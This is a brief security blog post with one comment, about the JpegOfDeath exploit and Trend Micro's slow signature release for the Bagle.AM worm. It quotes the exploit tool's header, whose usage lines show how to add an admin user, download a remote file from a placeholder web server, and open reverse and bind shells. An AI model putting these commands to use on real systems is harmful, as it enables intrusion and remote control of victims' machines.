JPEGofDeath and the Bagle variant (AM) – Trend Antivirus worries

From K-Otik — not sure if a compiled copy is floating around the ‘Net:

* Exploit Name:
* =============
* JpegOfDeath.M.c v0.6.a All in one Bind/Reverse/Admin/FileDownload
* =============
* Tweaked Exploit By M4Z3R For GSO
* All Credits & Greetings Go To:
* ==========
* FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack
* Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,
* Nick Fitzgerald, Adam Nance (where are you?),
* Santa Barbara, Jenna Jameson, John Kerry, so1o,
* Computer Security Industry, Rom Hackers, My chihuahuas
* (Rocky, Sailor, and Penny)…
* ===========
* Flags Usage:
* -a: Add User X with Pass X to Admin Group;
* IE: Exploit.exe -a pic.jpg
* -d: Download a File From an HTTP Server;
* IE: Exploit.exe -d http://YourWebServer/Patch.exe pic.jpg
* -r: Send Back a Shell To a Specified IP on a Specific Port;
* IE: Exploit.exe -r -p 123 pic.jpg (Default Port is 1337)
* -b: Bind a Shell on The Exploited Machine On a Specific Port;
* IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337)

Already the worm we saw enter our network yesteday due to Trend Micro’s slow virus signature release time included going out to a website to find a ws.jpg. The worm (W32/ or WORM_BAGLE.AM depending who you talk to) got while the virus signature was still in “controlled” release, which means you have to manually download it rather than specifically getting automatically. Norton does the same thing, but the delay is a killer. Suddenly, you have to break with normal procedures to maintain up-to-the-minute protection. Trend at 5 pm was still ranking this worm as low and no in the wild distributions — how wrong they were. NAI was much further ahead of the game than was Trend this time.

As for the exploit, it still looks like a means to an end. A beachfront exploit or a way into your network, not a worm-able product by itself. Plus why would you need this exploit when you still have ID10T users who open things like price.exe or joke.exe in an e-mail?


No comments yet to JPEGofDeath and the Bagle variant (AM) – Trend Antivirus worries

  • Darwin

    Yes, I agree, that Controlled Release is very annoying. We had a couple infections, due to that… Strange concept. Also, they need to make the deployment of controlled releases easier and common among their products… Trend Server Protect and/or OfficeScan control servers..